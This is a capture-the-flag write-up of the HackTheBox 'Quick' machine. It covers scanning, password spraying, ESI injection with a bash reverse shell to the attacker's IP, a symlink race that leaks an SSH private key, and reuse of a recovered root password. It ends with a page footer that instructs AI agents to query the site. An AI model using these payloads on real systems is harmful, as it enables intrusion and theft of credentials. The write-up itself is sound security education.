# Quick

## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.186 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. {% code overflow="wrap" %} ```bash # Nmap 7.93 scan initiated Tue Apr 4 11:08:07 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.186 Nmap scan report for 10.10.10.186 Host is up (0.036s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 9001/tcp open tor-orport # Nmap done at Tue Apr 4 11:08:22 2023 -- 1 IP address (1 host up) scanned in 14.71 seconds ``` {% endcode %} Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p22,9001 10.10.10.186 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. {% code overflow="wrap" %} ```bash # Nmap 7.93 scan initiated Tue Apr 4 11:08:43 2023 as: nmap -sCV -p22,9001 -Pn -n -oN targeted 10.10.10.186 Nmap scan report for 10.10.10.186 Host is up (0.036s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 fbb0618239504b21a862984c9c388270 (RSA) | 256 eebb4b72631710ee08ffe58671fe8f80 (ECDSA) |_ 256 80a6c27341f0354e5f61a76a50eab82e (ED25519) 9001/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Quick | Broadband Services |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Apr 4 11:08:58 2023 -- 1 IP address (1 host up) scanned in 14.64 seconds ``` {% endcode %} There seems to be a website on running on port 9001. Let's take a look at it.

## Exploitation The update message has a link to `https://portal.quick.htb/`, but port 443 is closed in the machine. But maybe we could access it in another way. Let's try HTTP3. First, we'll need to install [quiche](https://github.com/curl/curl/blob/master/docs/HTTP3.md#quiche-version). > git clone --recursive > > cd quiche > > cargo build --package quiche --release --features ffi,pkg-config-meta,qlog > > mkdir quiche/deps/boringssl/src/lib > > ln -vnf $(find target/release -name libcrypto.a -o -name libssl.a) quiche/deps/boringssl/src/lib/ Then, build curl. > cd .. > > git clone > > cd curl > > autoreconf -fi > > ./configure LDFLAGS="-Wl,-rpath,$PWD/../quiche/target/release" --with-openssl=$PWD/../quiche/quiche/deps/boringssl/src --with-quiche=$PWD/../quiche/target/release > > make > > make install Now, we should have a version of *curl* that supports *HTTP3*. Before trying to access `https://portal.quick.htb/`, we need to add the domain name to the `/etc/hosts` file. > nano /etc/hosts ``` # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.186 quick.htb portal.quick.htb ``` Finally, check the HTTPS website with the *curl* we just built. > src/curl --http3 "" -s -k ```html Quick | Customer Portal

Quick | Portal

Welcome to Quick User Portal

``` The `References` page, accessible from `index.php?view=docs`, shows a few interesting files. > src/curl --http3 "" -s -k ```html

Quick | References

``` Let's download and open the `Connectivity.pdf` file. We'll see in the `How to Connect?` section a password. > src/curl --http3 "" -k -o Connectivity.pdf > > open Connectivity.pdf

Now we need to find out where to authenticate, and with what user. Back to the main website, there was the button `Get Started`, which goes to the `login.php` login page.

On the other hand at the bottom of the main page, we saw a list of testimonials from some people.

And the `clients` link goes to a list of companies with their respective countries. As the login page asks for an email, we could create a wordlist such as the following by combining the name of the person who wrote the testimonial, together with the company domain name, using its country ccTLD. > nano users ``` tim@qconsulting.uk tim@qconsulting.co.uk roy@darkwing.us elisa@wink.uk elisa@wink.co.uk james@lazycoop.cn ``` As we now have a list of emails, let's password-spray the password that we found across all these emails, and see if it is valid for any of them. > wfuzz -c -w users -d "email=FUZZ\&password=Quick4cc3$$" {% code overflow="wrap" %} ``` ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.186:9001/login.php Total requests: 9 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000006: 200 0 L 2 W 80 Ch "roy@darkwing.us" 000000003: 200 0 L 2 W 80 Ch "john@quick.htb" 000000002: 200 0 L 2 W 80 Ch "mike@quick.htb" 000000008: 302 0 L 0 W 0 Ch "elisa@wink.co.uk" 000000007: 200 0 L 2 W 80 Ch "elisa@wink.uk" 000000004: 200 0 L 2 W 80 Ch "tim@qconsulting.uk" 000000005: 200 0 L 2 W 80 Ch "tim@qconsulting.co.uk" 000000001: 200 0 L 2 W 80 Ch "jane@quick.htb" 000000009: 200 0 L 2 W 80 Ch "james@lazycoop.cn" Total time: 0.102413 Processed Requests: 9 Filtered Requests: 0 Requests/sec.: 87.87931 ``` {% endcode %} The `elisa@wink.co.uk` email shows a different status code. Let's try to log in with that email and password.

We got in. It seems that the search bar of this ticketing system page is not working. But from `Raise Ticket` we could a ticket.

If we submit the ticket, a popup message will appear with a ticket identifier.

We need to find a way to search for tickets. Let's enumerate the website using *gobuster*. > gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x php * `dir` enumerates **directories or files**. * `-u` the **target** URL. * `-w` path to the **wordlist**. * `-t` number of current **threads**, in this case 200 threads. {% code overflow="wrap" %} ``` =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.186:9001 [+] Method: GET [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Extensions: php [+] Timeout: 10s =============================================================== 2023/04/04 18:01:48 Starting gobuster in directory enumeration mode =============================================================== /search.php (Status: 200) [Size: 1] /.php (Status: 403) [Size: 279] /index.php (Status: 200) [Size: 3353] /home.php (Status: 200) [Size: 86] /login.php (Status: 200) [Size: 4345] /clients.php (Status: 200) [Size: 2698] /db.php (Status: 200) [Size: 0] /ticket.php (Status: 200) [Size: 86] /.php (Status: 403) [Size: 279] Progress: 175328 / 175330 (100.00%) =============================================================== 2023/04/04 18:04:50 Finished =============================================================== ``` {% endcode %} There is one file called `search.php`, and it asks for a search item.

If we add the search GET parameter with the ticket identifier as its value, we'll see the ticket we created before. >

Let's see if there is a way to inject code in this ticketing system. If we take a look at the HTTP response headers, we'll see one called `X-Powered-By` that has the value `Esigate`. > curl -I ``` HTTP/1.1 200 OK Server: Apache/2.4.29 (Ubuntu) Content-Type: text/html; charset=UTF-8 Via: 1.1 localhost (Apache-HttpClient/4.5.2 (cache)) X-Powered-By: Esigate Content-Length: 2 ``` If we search on the internet for *Esigate* common exploits, we'll see an article called [ESI Injection Part 2: Abusing specific implementations](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/), which explains how to get *Remote Command Execution* on the server. First, we need to create a file called rce with a reverse shell command to our local system. > nano rce ```bash #!/bin/bash bash -i >& /dev/tcp/10.10.14.5/4444 0>&1 ``` Now, we need to create a few files called `rce.xml` and `rce.xsl` with the following code, that will download the `rce` file. > nano rce.xml > > cp rce.xml rce.xsl ```xml Process: Command: ``` Then, set a simple HTTP server with PHP on port 80 where all these files are located. > php -S 0.0.0.0:80 And a *netcat* listener on port *4444*. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Next, create a new ticket with the following message. {% code overflow="wrap" %} ```xml ``` {% endcode %}

Copy the ticket identifier.

Now, if we search for the ticket, it will download the rce file from our HTTP server. > ``` [Tue Apr 4 18:25:23 2023] 10.10.10.186:49454 [200]: GET /rce ``` Now we need to trigger the `rce` bash script and catch the reverse shell. We just need to change the command on both the `rce.xml` and `rce.xsl` file. > nano rce.xml > > cp rce.xml rce.xsl ```xml ... ... ``` Finally, if we reload the `search.php` page, the server will run the `rce` script, and we'll catch a reverse shell as `sam`. Then, we'll be able to grab the user flag. > ``` Listening on 0.0.0.0 4444 Connection received on 10.10.10.186 44264 bash: cannot set terminal process group (1110): Inappropriate ioctl for device bash: no job control in this shell sam@quick:~$ whoami whoami sam sam@quick:~$ cat user.txt cat user.txt 34e254646f1732834991f7261317899c ``` ## Privilege Escalation First, let's set an interactive *TTY* shell. > script /dev/null -c /bin/bash Then I press `Ctrl+Z` and execute the following command on my local machine: > stty raw -echo; fg > > reset > > Terminal type? xterm Next, I export a few variables: > export TERM=xterm > > export SHELL=bash Finally, I run the following command on our local machine: > stty size ``` 51 236 ``` And set the proper dimensions in the victim machine: > stty rows 51 columns 236 As seen below, there are other directories apart from the `html` directory in `/var/www/`. > ls -la /var/www ``` total 20 drwxr-xr-x 5 root root 4096 Dec 14 2021 . drwxr-xr-x 14 root root 4096 Dec 14 2021 .. drwxr-xr-x 2 root root 4096 Dec 14 2021 html drwxrwxrwx 2 root root 4096 Apr 4 14:53 jobs drwxr-xr-x 6 root root 4096 Dec 14 2021 printer ``` In fact if we check the apache `/etc/apache2/sites-enabled/000-default.conf` file, we'll see that there is virtual hosting being made with the domain `printerv2.quick.htb`. > cat /etc/apache2/sites-enabled/000-default.conf ```python # The ServerName directive sets the request scheme, hostname and port that # the server uses to identify itself. This is used when creating # redirection URLs. In the context of virtual hosts, the ServerName # specifies what hostname must appear in the request's Host: header to # match this virtual host. For the default virtual host (this file) this # value is not decisive as it is used as a last resort host regardless. # However, you must set it for any further virtual host explicitly. #ServerName www.example.com ServerAdmin webmaster@localhost DocumentRoot /var/www/html # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # For most configuration files from conf-available/, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with "a2disconf". #Include conf-available/serve-cgi-bin.conf AssignUserId srvadm srvadm ServerName printerv2.quick.htb DocumentRoot /var/www/printer ``` Let's add the domain name to our `/etc/hosts` file. > nano /etc/hosts ``` # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.186 quick.htb portal.quick.htb printerv2.quick.htb ``` There is another login page if we try to access the website.

As we have access to all the source code of the website, let's inspect it. The `/var/www/printer/db.php` file contains credentials for the MySQL database. > cat /var/www/printer/db.php ```php ``` Let's connect to the database using those credentials and enumerate the database. > mysql -u db\_adm -pdb\_p4ss There is one database called quick. > mysql> show databases; ``` +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | quick | | sys | +--------------------+ 5 rows in set (0.00 sec) ``` The quick database has three tables. > mysql> use quick; > > mysql> show tables; ``` +-----------------+ | Tables_in_quick | +-----------------+ | jobs | | tickets | | users | +-----------------+ 3 rows in set (0.01 sec) ``` The most interesting one is the `users` table, which has only two entries containing a password hash of the users `Elisa` and `Server Admin`. > mysql> select \* from users; ``` +--------------+------------------+----------------------------------+ | name | email | password | +--------------+------------------+----------------------------------+ | Elisa | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d | | Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 | +--------------+------------------+----------------------------------+ 2 rows in set (0.00 sec) ``` In fact, we can see how to passwords are being hashes in the `index.php` file. It is using the MD5 hash type and the `fa` salt. > cat /var/www/printer/index.php ```php ... $password = md5(crypt($password,'fa')); ... ``` As we won't be able to break the hash, we can simply change the hash of the `srvadm@quick.htb` user to be the same as the `Elisa`. > mysql> update users set password="c6c35ae1f3cb19438e0199cfa72a9d9d" where email=""; This way, we can log in as `srvadm@quick.htb` using the `Quick4cc3$$` password.

Once logged in, we'll see a print server website.

We can add a printer. As it is asking for an IP address, we can put our IP address, so we'll see what is going on with a *netcat* listener.

Set a netcat listener on port 5555. > nc -lvnp 5555 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Our new printer should be available from `Printers`.

By pressing the printer icon, we'll see a message saying that we should add a job.

From the `PRINT JOBS` section, we can create a new job, which will be received by the *netcat* listener when the `Print` button is pressed.

``` Listening on 0.0.0.0 5555 Connection received on 10.10.10.186 39462 testingVA ``` Let's inspect the source code and see if there is a way to escalate privileges. The /var/www/printer/job.php file has the following PHP code. > cat /var/www/printer/job.php {% code overflow="wrap" %} ```php if($_SESSION["loggedin"]) { if(isset($_POST["submit"])) { $title=$_POST["title"]; $file = date("Y-m-d_H:i:s"); file_put_contents("/var/www/jobs/".$file,$_POST["desc"]); chmod("/var/www/printer/jobs/".$file,"0777"); $stmt=$conn->prepare("select ip,port from jobs"); $stmt->execute(); $result=$stmt->get_result(); if($result->num_rows > 0) { $row=$result->fetch_assoc(); $ip=$row["ip"]; $port=$row["port"]; try { $connector = new NetworkPrintConnector($ip,$port); sleep(0.5); //Buffer for socket check $printer = new Printer($connector); $printer -> text(file_get_contents("/var/www/jobs/".$file)); $printer -> cut(); $printer -> close(); $message="Job assigned"; unlink("/var/www/jobs/".$file); } catch(Exception $error) { $error="Can't connect to printer."; unlink("/var/www/jobs/".$file); } } else { $error="Couldn't find printer."; } } ``` {% endcode %} For each new job, the web server is creating a new file with a date in the format `Y-m-d_H:i:s` as the name in the directory `/var/www/jobs/`. Then, it is putting the `Bill Details` of the job inside the file. Finally, it is connecting to the configured printer, and sends the content of the file. Before doing the connection, it is waiting for 0.5 seconds. This is a problem because in that period of time we could create a symbolic link between the file created in `/var/www/jobs/` and the private SSH key of the `srvadm` user. So when the server connects to our machine, we'll receive the `id_rsa` private key. Go to the `/var/www/printer` and run the following command. > cd /var/www/printer > > while true; do date=$(date +%F\_%H:%M:%S); if \[ -r $date ]; then ln -s -f /home/srvadm/.ssh/id\_rsa $date; fi ; done Now, go ahead and create a new job. When we hit `Print`, we should see the private SSH key of the `srvadm` user in our netcat listener.

``` Connection received on 10.10.10.186 39472 -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D ... +DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA= -----END RSA PRIVATE KEY----- VA ``` Copy and paste the key into the `id_rsa` file, give it the right permissions, and get a shell as `srvadm`. > nano id\_rsa; chmod 600 id\_rsa > > ssh -i id\_rsa srvadm\@10.10.10.186 {% code overflow="wrap" %} ``` Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue Apr 4 19:10:20 UTC 2023 System load: 1.13 Users logged in: 0 Usage of /: 73.1% of 7.75GB IP address for ens33: 10.10.10.186 Memory usage: 16% IP address for docker0: 172.17.0.1 Swap usage: 0% IP address for br-9ef1bb2e82cd: 172.18.0.1 Processes: 186 * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 52 packages can be updated. 27 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Tue Apr 4 18:42:58 2023 from 10.10.14.5 srvadm@quick:~$ whoami srvadm ``` {% endcode %} If we check his home directory, we'll see the `.cache` folder. > ls -la {% code overflow="wrap" %} ``` total 40 drwxr-xr-x 6 srvadm srvadm 4096 Apr 4 18:44 . drwxr-xr-x 4 root root 4096 Mar 20 2020 .. lrwxrwxrwx 1 srvadm srvadm 9 Mar 20 2020 .bash_history -> /dev/null -rw-r--r-- 1 srvadm srvadm 220 Mar 20 2020 .bash_logout -rw-r--r-- 1 srvadm srvadm 3771 Mar 20 2020 .bashrc drwx------ 5 srvadm srvadm 4096 Mar 20 2020 .cache drwx------ 3 srvadm srvadm 4096 Mar 20 2020 .gnupg drwxrwxr-x 3 srvadm srvadm 4096 Mar 20 2020 .local -rw------- 1 srvadm srvadm 62 Apr 4 18:44 .mysql_history -rw-r--r-- 1 srvadm srvadm 807 Mar 20 2020 .profile drwx------ 2 srvadm srvadm 4096 Mar 20 2020 .ssh ``` {% endcode %} Which has a few more directories in it. > ls -la .cache/ {% code overflow="wrap" %} ``` total 20 drwx------ 5 srvadm srvadm 4096 Mar 20 2020 . drwxr-xr-x 6 srvadm srvadm 4096 Apr 4 18:44 .. drwxr-xr-x 2 srvadm srvadm 4096 Mar 20 2020 conf.d drwxr-xr-x 2 srvadm srvadm 4096 Mar 20 2020 logs -rw-r--r-- 1 srvadm srvadm 0 Mar 20 2020 motd.legal-displayed drwxr-xr-x 2 srvadm srvadm 4096 Mar 20 2020 packages ``` {% endcode %} Inside the `conf.d` directory there is a file called `printers.conf` with some credentials in it. > cat .cache/conf.d/printers.conf ``` DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer ``` Let's url-decode the URI. > php --interactive {% code overflow="wrap" %} ``` Interactive shell php > echo urldecode("DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer"); DeviceURI https://srvadm@quick.htb:&ftQ4K3SGde8?@printerv3.quick.htb/printer ``` {% endcode %} We have a password that seems to be valid for the root user. So finally, all we have to do is reap the harvest and take the root flag. > su root ``` Password: root@quick:/home/srvadm# whoami root root@quick:/home/srvadm# cat /root/root.txt 53b4aa89af24e5b268b63aa398042f78 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/quick.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.